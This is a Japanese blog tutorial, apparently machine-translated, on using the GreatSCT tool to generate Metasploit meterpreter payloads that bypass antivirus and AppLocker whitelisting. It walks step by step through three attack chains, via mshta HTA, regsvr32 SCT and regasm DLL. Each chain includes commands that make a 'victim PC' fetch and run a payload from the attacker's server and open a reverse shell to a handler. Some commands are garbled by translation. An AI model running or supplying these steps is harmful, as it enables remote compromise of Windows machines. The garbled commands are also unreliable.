Jump to content
  • Entries

    16114
  • Comments

    7952
  • Views

    86370427

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

0x00 GreatSCTの紹介

GreatSCTは現在@ConsciousHackerによってサポートされています。このプロジェクトはGreat SCT(Great Scott)と呼ばれています。 Great SCTは、アプリケーションホワイトリストバイパスを生成するためのオープンソースプロジェクトです。このツールは、赤と青の両方のチームに適しています。これは、一般的なウイルス対策ソリューションとアプリケーションホワイトリストソリューションをバイパスするメタプロイトペイロードを生成するために使用されるツールです。

ここからダウンロードできます:https://github.com/greatsct/greatsct

0x01インストールと使用

最初にダウンロードしてインストールして、素晴らしいSCTの使用を開始する必要があります。次のコマンドを実行して、GitHubから優れたSCTをダウンロードし、インストール時にその依存関係ツールに注意してください。

これにより、次のツールを使用して、Applockerポリシーをバイパスするのに役立ちます。

installutil.exe:インストーラーツールは、インストーラーコンポーネントを実行して、特定のアセンブリにサーバーリソースをインストールおよびアンインストールできるコマンドラインツールです。

MSBUILD.EXE:Microsoft Build Engineは、アプリケーションを構築するためのプラットフォームです。このエンジンは、MSBuildとも呼ばれます。

MSHTA.EXE:MSHTA.EXEはMicrosoft HTMLアプリケーションを実行し、Windows OSユーティリティはHTA(HTMLアプリケーション)ファイルの実行を担当します。 JavaScriptまたはVisualでHTMLファイルを実行できます。

Regasm.exe:アセンブリ登録ツールは、アセンブリ内のメタデータを読み取り、必要なレコードをレジストリに追加し、COMクライアントが.NETフレームワーククラスを透過的に作成できるようにします。

regsvcs.exe:regsvcsは、NETサービスのインストールで知られているMicrosoft .NETリモートレジストリサービスを表します。

regsvr32.exe:regsvr32は、WindowsレジストリのDLLやActiveXコントロールなどのOLEコントロールを登録および登録するためのコマンドラインユーティリティです。

git clone https://github.com/greatsct/greatsct.git

CD greatsct

CDセットアップ

./setup.sh

ダウンロードした後、ヘルプについて次のコマンドを入力してください。

l4zxg3h41bo8260.png

バイパスを使用します

1oyz1ws33dy8261.png

次に、エクスプロイトリストタイプを取得します。

リスト

qoxrml2rljs8262.png

0x02悪意のあるHTAファイルを生成

Payloadのリストから、任意のターゲットを選択して、目的の攻撃を実行できます。しかし、この攻撃では、次のことを使用します。

MSHTA/shellcode_inject/base64_migrate.pyを使用します

f3xz3rkrpit8263.png

コマンドを実行した後、次のコマンドを入力してください。

生成する

r3whf34hk148264.png

Generateコマンドを実行した後、使用する方法を尋ねます。 MSFvenom Type 1を使用して最初のオプションを選択するためです。 meterpreterのEnterをクリックします。その後、LhostとLportが提供されます。つまり、それぞれ192.168.1.107と4321です。

f34fe5uujr38265.png

シェルコードを生成するとき、ペイロードの名前を提供するように依頼します。デフォルトでは、ペイロードを名前として受け取ります。名前を入力したくないので、Enterを押すだけです。

dw41p5zsof58266.png

これで、2つのファイルが作成されます。 1つのリソースファイルと別のHTAファイル。

hubmgpgewfc8267.png

まず、次のコマンドを入力して、/usr/share/greatsct出力/ソースでpythonサーバーを起動します。

python -m simplehttpserver 80

1hhry2hgvzu8268.png

次に、被害者PCのコマンドプロンプトでHTAファイルを実行します

Mshta.exe http://192.168.1.107/payload.hta

4xsez4tymc18269.png

リソースファイルを使用してマルチ/ハンドラーを起動します。これを行うには、次のコマンドを入力してください。

MSFCONSOLEL -R /USR/SHARE/GREATSCT OUTPUT/HANDLERS/PAYLOAD.RC

3uinwwxrycm8270.png

0x03悪意のあるSCTファイルを生成

Payloadリストから、任意のターゲットを選択して目的の攻撃を実行できます。しかし、この攻撃では、次のことを使用します。

regsvr32/shellcode_inject/base64_migrate.pyを使用します

ar50o5wqatn8271.png

コマンドを実行した後、次のコマンドを入力してください。

生成する

3x1dcgifmfj8272.png

その後、ペイロードをお願いします。 Enterを押すだけで、Windows/MeterPreter/Reverse_TCPがデフォルトのペイロードとして使用されます。これがペイロードに必要なものです。この後、192.168.1.107と特定のポート(Any)を提供します。下の図に示すように、Lportを2345に設定します。

xifa5cepejg8273.png

詳細を提供した後、マルウェア名を要求します。デフォルトでは、名前をペイロードに設定して、名前を指定するか、Enterを押してデフォルトの設定を作成するだけです。

us35ktopkm48274.png

Enterを押すと、2つのファイルが生成されます。 1つはリソースファイル、もう1つは.sctファイルです。次に、Pythonのサーバーで/usr/share/greatsct出力/ソースを入力して開始します。

python -m simplehttpserver 80

jfekeckt3t08275.png

以下に示すように、被害者PCの実行ウィンドウで.SCTファイルを実行します

regsvr32.exe /s /u /n /i:http://192.168.1.107/payload.sct

dflzh4dslih8276.png

同時に、リソースファイルを使用してマルチ/ハンドラーを起動します。これを行うには、次のコマンドを入力してください。

MSFCONSOLEL -R /USR/SHARE/GREATSCT OUTPUT/HANDLERS/PAYLOAD.RC

5iyc4jo4p3l8277.png

0x04悪意のあるdllファイルを生成

Payloadリストから、任意のターゲットを選択して目的の攻撃を実行できます。しかし、この攻撃では、次のことを使用します。

Regasm/MeterPreter/Rev_tcp.pyを使用します

sbbxfxjdfqz8278.png

コマンドを実行した後、以下を入力してください。

LHOST 192.168.1.107を設定します

生成する

ew1z1y5ksie8279.png

詳細を提供した後、マルウェアの名前を尋ねます。デフォルトでは、名前をペイロードに設定するため、名前を指定するか、Enterを押してデフォルトの設定を作成できます。

1h02imx4w0x8280.png

Enterを押すと、DLLファイルが生成されます

fnrtwyn10hi8281.png

次のコマンドを入力して、/usr/share/greatsctでpythonサーバーを起動します。

python -m simplehttpserver 80

qtaxz0mlvpa8282.png

次に、上記のdllファイルをc: \ window s \ microsoft.net \ framework \ v4.0.30319 \ v4.0.30319 \に配置し、以下に示すように犠牲者PCのコマンドウィンドウで.dllファイルを実行します。

c: \ windows \ microsoft.net \ framework \ v4.0.30319 \ regasm.exe /u payload.dll

hcz0es30s1x8283.png

同時に、リソースファイルを使用してマルチ/ハンドラーを起動します。これを行うには、次のコマンドを入力してください。

MSFCONSOLEL -R /USR/SHARE/GREATSCT OUTPUT/HANDLERS/PAYLOAD.RC

bbxktsjridu8284.png